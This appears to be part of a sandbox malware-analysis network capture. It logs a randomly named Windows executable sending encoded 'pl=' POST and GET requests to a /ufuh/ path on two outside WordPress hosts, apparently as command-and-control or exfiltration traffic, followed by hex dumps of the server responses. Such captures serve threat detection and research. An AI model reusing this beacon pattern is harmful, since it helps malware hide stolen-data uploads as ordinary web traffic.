                                                                                            May 2, 2024 08:28:18.663425922 CEST1124INData Raw: 71 b0 82 42 11 c5 08 57 83 00 00 b6 57 7b 94 97 0c 7a 77 54 eb 12 64 a9 6b 1e 6c 74 3c 8c 0a 04 db c7 50 7d c6 f0 a4 95 40 9c d1 e2 b5 32 03 08 b6 1f d2 f2 9d 09 62 74 3a 1c 4a 42 19 c2 53 35 e4 78 5b 3f 5c ad 17 c3 15 62 7d ab ea 45 ca 39 54 29
                                                                                            Data Ascii: qBWW{zwTdklt<P}@2bt:JBS5x[?\b}E9T)t8Bm=[6Qy[ru\;vH6/ddSp[\RtD*Bx-=B%4%P4/g[jjKXg2:4X\tR-vFv7Nw[^


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            16192.168.2.2249180198.12.241.35802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:28:21.107579947 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.aceautocorp.com
                                                                                            Origin: http://www.aceautocorp.com
                                                                                            Referer: http://www.aceautocorp.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 6d 43 38 6c 66 71 4d 48 33 4b 39 4f 69 4e 76 61 39 65 48 57 2f 70 74 72 5a 4e 46 76 61 35 50 41 4e 45 69 74 78 74 79 41 6f 32 37 36 78 74 65 72 68 75 44 4f 6e 6b 74 4c 51 76 58 67 63 61 5a 61 6c 4f 55 73 4f 35 4a 63 76 63 56 32 2b 35 35 57 37 72 2f 4a 79 77 75 51 46 6f 44 62 64 51 37 55 47 4b 46 73 57 55 68 4c 76 4d 43 73 79 57 67 68 65 76 69 6b 51 43 4a 33 51 31 5a 39 65 6d 49 43 70 63 38 71 43 44 4a 73 41 75 76 63 6f 63 46 47 4f 59 2b 78 32 66 47 4a 65 51 61 51 4e 4e 77 78 6a 4d 72 79 62 6c 68 6b 31 39 47 6c 4b 5a 36 45 62 2f 64 58 61 52 37 47 79 75 75 66 50 36 54 71 4b 6f 56 61 46 32 54 63 59 56 6d 43 39 75 6f 76 53 6e 47 6d 7a 57 4f 31 59 49 2f 44 52 52 50 70 6e 41 6c 49 64 52 65 66 36 79 62 51 6d 77 6d 38 50 63 61 6a 59 33 7a 59 2f 35 57 48 6f 71 48 37 65 71 75 4e 4c 39 47 54 65 2f 64 54 31 77 66 36 64 4c 6d 48 38 33 2f 45 57 35 7a 6c 50 4a 47 6a 62 35 46 68 56 79 58 4e 56 45 51 37 71 31 41 32 65 37 58 7a 4e 71 39 55 4a 45 37 59 56 77 72 42 77 30 68 75 39 75 32 2f 61 39 4d 65 44 67 33 [TRUNCATED]
                                                                                            Data Ascii: pl=mC8lfqMH3K9OiNva9eHW/ptrZNFva5PANEitxtyAo276xterhuDOnktLQvXgcaZalOUsO5JcvcV2+55W7r/JywuQFoDbdQ7UGKFsWUhLvMCsyWghevikQCJ3Q1Z9emICpc8qCDJsAuvcocFGOY+x2fGJeQaQNNwxjMryblhk19GlKZ6Eb/dXaR7GyuufP6TqKoVaF2TcYVmC9uovSnGmzWO1YI/DRRPpnAlIdRef6ybQmwm8PcajY3zY/5WHoqH7equNL9GTe/dT1wf6dLmH83/EW5zlPJGjb5FhVyXNVEQ7q1A2e7XzNq9UJE7YVwrBw0hu9u2/a9MeDg3BxwwnvxmQU2cRcb0ZoTOGvu8J+ZjdDZ87Ilc/yRlVblbceoFudcmJQKzLuClsA1FBpobw8PEMhuN7Bf9tpF0S1qkOdG75O+DYuoP3+X5ESJlF/OS0AVwXWRRhpj0nZZO1PQIZn1ZwF98WYw59GgQwLnScbcC27jd3jHHIDFKrO8/TZyykAbaNKIpcVfGxvA2BF/ah+vn1QFoug08M2JnfrpfUWIJWDcUqq4RxT6HPMJVCLrMQErtG3BZNsXW3Ugbm3G7W3ySdaNqHQEEmayKa34fJFgZSBl67cy31ZoQ6JGvlfl3Vu+82K9e0u/wvF7lAvlzGFqJx0uGP6mlEr7v/2SaKdMYN8o1wf1O7y0bC70jBtwdaKWKGEy6aJH6jDvsQuPWBPEVFPrXtQUxTpNAdu7gOmBIQQHfFmtR9HQlKoGJkaoRvq7np5DmuKuWT4DEgS18dCo5M7kFOp0g4YLqKpYvL0it/nrO6rA/LANXJT51zhN9tzR9fwSGbA4GZzOHfmkmhjA+avfY2R/KtpLfbi4ZxU81Mv5SrcU0vsmZZOxwSfBH3Gs4Ta001fkXHFjFzbrIXs/jBtNPKTvWzbc0HFwDKD9jh754yeH4tRP2H8dfrClNVvGuvHpBnx6Vk9A3mJnEgQVU6voRJdDVMEB4GDAbFPu+0gMfdb [TRUNCATED]
                                                                                            May 2, 2024 08:28:21.263585091 CEST1576OUTData Raw: 66 53 67 35 41 41 34 4d 2f 33 71 4f 6d 33 77 7a 71 68 59 30 36 52 57 65 4a 38 75 4e 77 48 32 37 37 47 59 49 48 79 4c 78 6b 48 51 63 4d 67 54 39 78 6a 61 4a 63 51 79 68 31 70 50 6f 61 7a 4c 58 54 76 35 2b 79 35 76 6a 6b 66 45 77 64 47 38 63 79 78
                                                                                            Data Ascii: fSg5AA4M/3qOm3wzqhY06RWeJ8uNwH277GYIHyLxkHQcMgT9xjaJcQyh1pPoazLXTv5+y5vjkfEwdG8cyxLT0ZOdrNM/CZC6bEkCdzV5k6zZOSeqTADyWzSvJ1f6UbHrho4LYyPmadBy78ckm50NpQOX+06zp5V9BKB6tZTH7oDcxwZyAP+p5vPMuvXU7pnN6hnzZBzG3VuBGUHfw8s0puOKS0guR8OA/SKE+exzBK0wLsYttuV
                                                                                            May 2, 2024 08:28:21.503128052 CEST1289INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 02 May 2024 06:28:21 GMT
                                                                                            Server: Apache
                                                                                            X-Powered-By: PHP/8.1.28
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade, close
                                                                                            Vary: Accept-Encoding
                                                                                            Content-Encoding: br
                                                                                            Content-Length: 9730
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Data Raw: 13 53 cb 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 9f a9 da 9f a5 cb e9 19 9e 48 84 03 40 00 58 5a a8 14 67 8b 7f 69 4e 7e b3 3d 1e 88 04 25 6e 28 82 03 40 c5 cb e5 5f b6 ea f3 bc a5 63 32 81 24 59 32 81 97 2c 39 06 a2 b9 7a 90 79 aa ea 9e 8e a8 9e d9 d1 70 a8 17 4e 31 24 c5 e2 1d 67 be 84 aa ae ae ee e1 fb fb 91 c1 33 84 e8 38 72 ec 19 61 0b d8 70 64 b8 64 58 86 6c 3d 86 6a b2 fd b4 fb 06 11 51 14 51 93 76 db 70 79 99 58 f7 de 86 10 ac 25 02 13 93 a1 9a c9 d8 e4 97 03 27 30 58 c8 54 32 df 5a 8c b9 bd 10 f9 21 22 92 70 57 3d 45 37 cf 39 e5 74 4c 81 19 a8 3e 4a c0 e0 76 c9 35 60 d2 59 2b a4 87 09 0e f6 69 16 b9 6c 1f ae 50 b2 ab bd c4 70 95 53 0a 88 16 3a 07 45 5b 15 ee 10 81 d8 52 ea 36 2b 81 cb 7c 4a d7 a9 3f ec d6 2f 07 d6 47 75 3d 07 c6 20 1d 63 99 16 f1 4c d7 9e 29 be c0 be 19 18 8c 07 76 25 90 77 ef 5d 88 12 3e d7 1a 3e 9f bc 81 d4 31 ce 7a f6 48 cb 0f 7d 37 fc 00 ab fb 6a dd 0c 0e f3 35 68 b5 af 0f eb 13 37 5c 6c b3 51 b5 be df 84 4d 3b 4e f0 a0 d0 b4 c7 0a 88 a3 69 9d 91 4b 37 9c 15 e8 a8 83 [TRUNCATED]
                                                                                            Data Ascii: SC@E`:H@XZgiN~=%n(@_c2$Y2,9zypN1$g38rapddXl=jQQvpyX%'0XT2Z!"pW=E79tL>Jv5`Y+ilPpS:E[R6+|J?/Gu= cL)v%w]>>1zH}7j5h7\lQM;NiK7p^ucBN6_m},5Ce{fQo*Pnz]y8v3<&{iy<oD87yW$7D;qe;z;lhBjr$c:ysDu*uVQ=Y*a1h8uuZ,o:2L.}@yW7+4)EwufxfN!mGw[1\~YiI<fy8DZgk'>sDoO8uI+J{7P~V/.W0U@/EVhzVx&5tUUo<QSF*<OMmSy|7'k?M^6DtJxm"~bW]OYFDAr~5]nij~n
                                                                                            May 2, 2024 08:28:21.503161907 CEST1289INData Raw: cf 58 0a 22 e5 df d8 82 60 8c d9 0a cd f7 03 2d ab d5 a0 9b aa 88 ff 52 d3 c2 7f 8c fd a1 ad 16 72 e8 63 6d 46 bd 5a 29 0d 75 b8 77 8b 2b 0f 35 58 f2 31 4f 8f ff bd 6d 2b fe f4 3e b3 26 81 b2 75 8d 44 cc 71 d1 a9 08 35 94 9b 0f 41 98 a8 ca 66 7e
                                                                                            Data Ascii: X"`-RrcmFZ)uw+5X1Om+>&uDq5Af~u/I+V*7|Tbr]!oFDkM"!>NLf?gg_*(1P!j=3,=s4'blT=Y{5*0?UjNr
                                                                                            May 2, 2024 08:28:21.503180027 CEST1289INData Raw: 56 63 31 18 1f 14 f6 fb 26 2e ec f2 5f 42 7b ed bd b6 53 d7 09 b0 a3 50 e2 98 cb 58 a4 8f 6e f0 58 2b ec fb f4 61 fd 3f 55 f6 09 ce cb 2b 97 4a 07 58 92 95 69 9d 31 ae 76 7c 31 13 fa 08 1c 78 c9 76 ec 97 c2 e3 5f a5 45 8f 05 18 3e 66 e7 9d 69 de
                                                                                            Data Ascii: Vc1&._B{SPXnX+a?U+JXi1v|1xv_E>fi+1L-G<`jDbu2qI_H&YAM{VuUcbQwB'oX\$k[DR9#]QmS;'HJb#Q`{m+F&dhZ
                                                                                            May 2, 2024 08:28:21.503211021 CEST1289INData Raw: aa 58 ad 61 f7 13 cb c5 a2 6d 8a 35 b1 bc bb 7e 9d 11 e3 06 51 9d 8b 60 b9 17 f6 52 8c 5c 9b d1 b5 73 ce 9c f1 14 44 d4 1d 4e 85 72 86 c7 ea c0 74 51 a6 04 69 19 e0 3b 43 b4 61 9e b5 20 30 37 29 e6 67 a4 53 0f 29 ce f6 48 e9 bc 8b 1a 55 d5 6e 83
                                                                                            Data Ascii: Xam5~Q`R\sDNrtQi;Ca 07)gS)HUn[zJ?LD,)RQdFfvIzbj^XM!) qpaTq0)'RkLWQ'e3vxJ&*<dR3B#)&0
                                                                                            May 2, 2024 08:28:21.503254890 CEST1289INData Raw: 12 25 24 4a 3e 44 2d c6 4a de ec 8a 7d 0b e2 80 0c 33 72 ab e1 57 8a 24 27 22 8b 60 4d 79 cc 02 4c 38 03 f1 c2 8c 31 b7 3d 75 a3 ae bd 3d 1d 3f 7e 21 8d 08 24 51 e1 9b f5 ae 25 88 90 a7 b3 e5 18 64 2e 40 e1 1c 4c 30 44 eb df 1c 66 b5 a8 8a 0c 24
                                                                                            Data Ascii: %$J>D-J}3rW$'"`MyL81=u=?~!$Q%d.@L0Df$~$Me$lkKhl6X\W-yBd`"#vvN:]c}:&"aaQLkfO'9^!Bfyc8A2$&Yb<b|D4$K5%R,P/IUGmW-\5#B6|mBV%
                                                                                            May 2, 2024 08:28:21.503299952 CEST1289INData Raw: 26 df 29 d7 ff ab c6 65 d1 c3 c6 41 78 d2 f4 56 44 47 5c 67 87 f5 55 4d 2d 81 39 3e e1 0c b3 95 04 fe 96 96 c9 60 93 22 d5 94 ba 63 9b cc c6 5d 17 80 2b 18 a9 80 39 1e e1 9c 58 0e 15 2c cf dd 78 c1 57 a5 d7 84 cb 90 ea cb c8 8b 71 d9 ab e1 8c 23
                                                                                            Data Ascii: &)eAxVDG\gUM-9>`"c]+9X,xWq#VuPW6Np^3lqq|.)Ho2Q!DX:RK?0MC.PZ-Tl2p>I8D1C2U()WD&'SS$r>rg|#wTo]@C<qg|H
                                                                                            May 2, 2024 08:28:21.503359079 CEST1289INData Raw: 89 4e 47 ca da cd 55 c1 49 2f c4 6c c9 49 d8 4c e2 6e 0b af f7 c6 76 da 4d 53 26 fa ce e5 c0 03 d4 bf 8d 68 c0 ee e8 9b 41 c2 c3 81 ec 4c 87 c1 ea 59 9a a3 39 16 8d d8 1c 25 14 41 ad fa 14 23 01 83 cf a6 ac 56 c5 99 2b aa 0d 89 ca 25 09 3d 98 22
                                                                                            Data Ascii: NGUI/lILnvMS&hALY9%A#V+%="}S#L3%I'0hr<Mw$FUS'tIr1icvk1H4gUR)~,kN#HI-=.UR}V #
                                                                                            May 2, 2024 08:28:21.503511906 CEST1124INData Raw: 71 b0 82 42 11 c5 08 57 83 00 00 b6 57 7b 94 97 0c 7a 77 54 eb 12 64 a9 6b 1e 6c 74 3c 8c 0a 04 db c7 50 7d c6 f0 a4 95 40 9c d1 e2 b5 32 03 08 b6 1f d2 f2 9d 09 62 74 3a 1c 4a 42 19 c2 53 35 e4 78 5b 3f 5c ad 17 c3 15 62 7d ab ea 45 ca 39 54 29
                                                                                            Data Ascii: qBWW{zwTdklt<P}@2bt:JBS5x[?\b}E9T)t8Bm=[6Qy[ru\;vH6/ddSp[\RtD*Bx-=B%4%P4/g[jjKXg2:4X\tR-vFv7Nw[^


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            17192.168.2.2249181198.12.241.35802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:28:23.793699026 CEST468OUTGET /ufuh/?pl=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.aceautocorp.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:28:23.986429930 CEST548INHTTP/1.1 301 Moved Permanently
                                                                                            Date: Thu, 02 May 2024 06:28:23 GMT
                                                                                            Server: Apache
                                                                                            X-Powered-By: PHP/8.1.28
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            X-Redirect-By: WordPress
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade, close
                                                                                            Location: http://aceautocorp.com/ufuh/?pl=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L&5h1t=6H6PKFvXjtI4u8k
                                                                                            Vary: Accept-Encoding
                                                                                            Content-Length: 0
                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            18192.168.2.2249182183.111.183.31802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:28:32.325015068 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.mrart.co.kr
                                                                                            Origin: http://www.mrart.co.kr
                                                                                            Referer: http://www.mrart.co.kr/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 51 46 71 4d 4f 53 41 54 44 74 46 4d 53 50 59 71 72 77 50 30 43 30 56 7a 45 6d 38 6f 6d 4b 62 65 59 4e 4d 42 53 78 6d 67 79 32 70 68 58 46 31 6f 75 67 67 4b 39 46 54 65 4e 7a 79 72 31 54 4c 38 61 73 51 43 68 73 6e 61 69 52 61 65 68 38 52 56 36 53 6b 45 62 4c 6e 62 35 51 75 2b 4a 74 52 30 45 69 35 57 6e 67 44 79 52 76 59 30 32 4d 52 75 6f 4e 67 63 42 31 73 69 59 76 30 39 37 32 6a 47 76 31 37 63 70 6c 61 65 73 34 53 54 6c 42 65 66 59 32 6c 5a 41 6e 41 45 4b 58 4a 37 38 77 4c 48 46 76 32 70 78 47 78 53 38 54 2f 70 56 42 4b 2b 76 39 78 38 76 4f 6e 49 42 35 6a 4c 42 6e 54 6d 72 74 47 37 6a 69 79 34 38 71 50 6a 56 4a 44 76 6b 46 38 37 6e 35 6e 62 55 56 50 42 59 72 49 42 36 79 59 38 51 68 4d 6d 65 6e 6e 70 61 61 71 59 58 2f 43 77 53 41 63 6a 30 54 32 4f 6b 34 32 5a 74 6c 54 4b 7a 34 49 6c 38 62 75 31 6e 62 72 45 44 4d 58 4c 52 78 39 63 51 33 59 6a 56 4f 55 6f 2f 39 7a 41 6c 73 49 78 56 70 49 63 46 58 56 62 74 66 34 75 52 38 4a 6f 54 74 69 61 2f 38 63 6e 56 4e 45 76 6a 58 76 2b 71 35 68 4c 59 78 7a [TRUNCATED]
                                                                                            Data Ascii: pl=QFqMOSATDtFMSPYqrwP0C0VzEm8omKbeYNMBSxmgy2phXF1ouggK9FTeNzyr1TL8asQChsnaiRaeh8RV6SkEbLnb5Qu+JtR0Ei5WngDyRvY02MRuoNgcB1siYv0972jGv17cplaes4STlBefY2lZAnAEKXJ78wLHFv2pxGxS8T/pVBK+v9x8vOnIB5jLBnTmrtG7jiy48qPjVJDvkF87n5nbUVPBYrIB6yY8QhMmennpaaqYX/CwSAcj0T2Ok42ZtlTKz4Il8bu1nbrEDMXLRx9cQ3YjVOUo/9zAlsIxVpIcFXVbtf4uR8JoTtia/8cnVNEvjXv+q5hLYxzaMQ2vCA/BsC8WH86gLF8/UyQbGZd+ou5IUjTlGuHOXW2SgrcdaxhzKmMMZIpdV95qcHLNYmZ1h+l0LNrZZZxZGnuXw3CXs6+qd7Gu6XCEpI7Lo0jk5k1rzHKFD8gE/ifnXH7OBgb+2VgNsnPdS4DUx0CcxQ4MgWdEq13VnR7YAzrNEfedlV0Erh2wmfO0zspCRsyagYKKbhhi9M+vKCAXDPM79I/o7LokSH22m+jiLD3gHT3JqgPu36QwzM2a0Sq9OMWW+oaumVCLZweMZlyQeoykgfWwJ1XnH/TFomLZ3kaSrfi2zmX7DxvGELkUTgpCO7Ixr8p2paN297cR69QUn8Z5dtyrATltOM6dgLPRKvJ8NMKXnHxR4jsBveJi1ppDpi1XCJ2RdNgXrOoq9vxSEekLSSfynoQaS09XtgaKX76xfW5nbalBTDHWs1EjCYxT09uOu2kInhuycUSnG64SRYDS5vlier2JtFC4H657xtCSKaVq88K9t8TsdJBB8HsoxFMm6Qf8cruX4jiMme2MMSeEx/otLPz07Xtmy8JNAruIlK8wEYQR2jcMViaOLYoo9B9GA/tH8AfHMA3oOKyqQ/36hGoS7YtY3CJWVvIGhyN7jFWyphbzFV0OW7g89wzpkHtBhrA2mec8kB2NO7pv/YSieAkt+KnOb [TRUNCATED]
                                                                                            May 2, 2024 08:28:32.604337931 CEST100OUTData Raw: 69 4a 34 68 51 59 70 6e 35 66 72 4c 46 38 43 6b 42 52 46 53 78 70 78 2b 54 5a 4b 57 5a 44 37 56 38 58 50 58 64 64 35 78 39 50 34 43 77 30 73 79 66 55 79 79 61 77 59 37 39 39 4f 64 70 78 68 76 35 30 4e 54 64 48 4e 6b 45 6f 35 45 34 79 77 4b 41 62
                                                                                            Data Ascii: iJ4hQYpn5frLF8CkBRFSxpx+TZKWZD7V8XPXdd5x9P4Cw0syfUyyawY799Odpxhv50NTdHNkEo5E4ywKAbjAILb5a9azWcnxKvm0
                                                                                            May 2, 2024 08:28:33.182195902 CEST1289INHTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:28:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding,Cookie
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://mrart.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                            Content-Encoding: gzip
                                                                                            Data Raw: 31 39 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 3d 6b 8f dc 46 72 9f 2d e0 fe 43 2f 05 69 67 4e 24 87 e4 3c 76 76 76 67 75 3a 59 be 73 e2 3b 19 5a 19 87 83 24 2c 7a c8 9e 19 4a 1c 92 26 39 fb b8 f5 02 ce 9d 12 5c 62 03 f9 60 1b 30 12 1b 30 72 97 7c f2 87 c4 b9 03 1c 20 f9 43 d2 fa 3f a4 aa 9b 8f 1e 0e e7 b1 0f 1d 10 20 6b ed ec b0 bb ba aa ba ba aa ba aa 9b dd de dd 78 fb e1 fd c7 bf 7e ff 01 19 27 13 6f ef 47 37 76 f1 2f f1 a8 3f ea 2b 2f 02 ed af 1f 29 bc 90 51 07 fe be b5 3b 61 09 25 f6 98 46 31 4b fa ca 07 8f df d1 ba 4a 51 e1 d3 09 eb 2b 87 2e 3b 0a 83 28 51 88 1d f8 09 f3 01 f0 c8 75 92 71 df 61 87 ae cd 34 fe a0 12 d7 77 13 97 7a 5a 6c 53 8f f5 4d 81 c6 73 fd 17 24 62 5e 5f 09 a3 60 e8 7a 4c 21 e3 88 0d fb ca 38 49 c2 5e a3 31 9a 84 23 3d 88 46 8d e3 a1 df 30 cd 32 ed cd 28 18 04 49 bc 99 53 de f4 03 d7 77 d8 b1 4a 86 81 e7 05 47 9b a4 b1 77 03 9a 6c 68 1a 79 3c 76 63 12 bb 09 23 f0 37 08 13 77 e2 fe 86 39 e4 c8 4d c6 24 19 33 f2 eb 80 c6 09 d9 7f f0 90 84 de 74 e4 fa e4 d0 b2 74 93 68 04 [TRUNCATED]
                                                                                            Data Ascii: 19e3=kFr-C/igN$<vvvgu:Ys;Z$,zJ&9\b`00r| C? kx~'oG7v/?+/)Q;a%F1KJQ+.;(Quqa4wzZlSMs$b^_`zL!8I^1#=F02(ISwJGwlhy<vc#7w9M$3tthy`8"'X7hY 7t$wxxy~/^'<hd(9+(0I/&X8$A_HQj(qj<aB4q9w<}c&TE4+{O8D)TEU~" {Oi`XJM"/#64A%noi7Ua+Z|_s12_wAEFs3BUX$:y!=}&Gs&qp)E>&3UqLA+gjCK+\kPYLNF9UT#"RB-54ZBhyWo?QSY*m+NT1sGcf{L0y7n
                                                                                            May 2, 2024 08:28:33.182224035 CEST1289INData Raw: 79 c8 12 7b bc 29 26 92 cd 19 7a 7c 3a 58 d9 60 08 b2 8b f5 51 10 8c 3c 46 43 37 46 97 5f 6a a9 50 0f 54 de 47 73 aa f0 6f 51 1c df 39 9e 78 50 85 ce 78 a9 ab 24 b7 23 fa e1 34 d8 21 3f 7c fe df af 3f fb 4a 9e fe ca b2 1a 32 e6 34 94 37 cd c7 eb
                                                                                            Data Ascii: y{)&z|:X`Q<FC7F_jPTGsoQ9xPx$#4!?|?J247O?{kB2_3}w9=T1xr{=!?n8:8B6,IONOO~P)iln<mlY[SC1y.rl@9F6o068o%i=Et}:Hy
                                                                                            May 2, 2024 08:28:33.182297945 CEST1289INData Raw: 67 da ab c2 9c 37 40 09 51 75 ab 5a 14 c6 5b 8d b1 a8 2f e1 ae ef 5c 19 df 86 04 81 8c 42 4f c1 1d a0 37 3e e9 6f 98 f0 14 e1 d7 fb d4 f3 06 d4 7e 21 db ba 0c 68 9c cd 89 b5 88 63 2a aa b8 d2 56 33 ff d1 47 b5 12 51 18 d7 1a c3 9e f0 30 fc a3 8f
                                                                                            Data Ascii: g7@QuZ[/\BO7>o~!hc*V3GQ0R ~7xo[8J.}BMVY]]1Z'aP^qrC~^CBf63Z0OT99[=lc-SAeI{dR]
                                                                                            May 2, 2024 08:28:33.182352066 CEST1289INData Raw: c2 60 84 4c 66 b0 04 47 64 8f e8 3c b9 f3 d8 30 39 85 12 8a a6 08 df 77 44 6a 98 c5 dc 71 02 49 16 60 2a 15 33 4c fa ac 95 c8 23 34 f1 0c 3b 7f a8 46 8f 98 2a 08 18 2b d0 db e0 2f 58 74 9a b6 44 ee 7b 3c c1 92 13 ce b4 32 12 ce a6 5c 3b 87 df 0e
                                                                                            Data Ascii: `LfGd<09wDjqI`*3L#4;F*+/XtD{<2\;8(QT7.T!Kj3+WOZ\qH0!r;o1<U+;>~i~hG-~p46'0qn4_APpO0e<g9}H?vG4Su\jZ
                                                                                            May 2, 2024 08:28:33.182432890 CEST1289INData Raw: ce af 8f 11 97 d0 d0 ac 22 7e e1 86 1a 57 30 71 98 4b c3 53 2a 98 de e2 e9 f3 54 bb 6e 4e a8 eb 2b 7b fb 00 4a 92 20 1b dc dd 06 e5 82 e0 d7 ed b0 88 d3 9c d0 38 c1 c7 9c 2e f7 11 29 80 42 a2 00 fd d5 80 fa e0 72 14 d1 18 b9 cd 78 e4 60 4a 2a dd
                                                                                            Data Ascii: "~W0qKS*TnN+{J 8.)Brx`J*ed#/@W~zgs!-f@Fgdr^PbM-4*\J:#[H4aRQ84a]\V]QB<G#'~D'-M}$uGA$ylAQ{k.@
                                                                                            May 2, 2024 08:28:33.182449102 CEST593INData Raw: e5 f7 e7 ff f4 f9 46 65 b8 9d 7d 2e 19 c1 d6 ff d5 11 14 f7 5e 8a 41 0c 16 0e 62 76 e9 a5 c8 0f 57 00 1d 1c a4 df 30 93 c2 3b 50 3c 86 0e 11 17 4d d7 6e aa e1 62 b1 b2 44 2b e6 5b 88 65 b3 eb 52 8d 9b 19 5a b3 5a 49 ce bf fe 92 5c 84 3b 3a 05 ef
                                                                                            Data Ascii: Fe}.^AbvW0;P<MnbD+[eRZZI\;:/={?1>~o**IQkwB(fji1j9N+e0^Db|>V^N+"U"?JUE(!5D,0XJM_~|*]wq<
                                                                                            May 2, 2024 08:28:33.183585882 CEST20INData Raw: 61 0d 0a 03 00 09 83 4c 10 53 64 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: aLSd0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            19192.168.2.2249183183.111.183.31802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:28:35.127638102 CEST717OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.mrart.co.kr
                                                                                            Origin: http://www.mrart.co.kr
                                                                                            Referer: http://www.mrart.co.kr/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
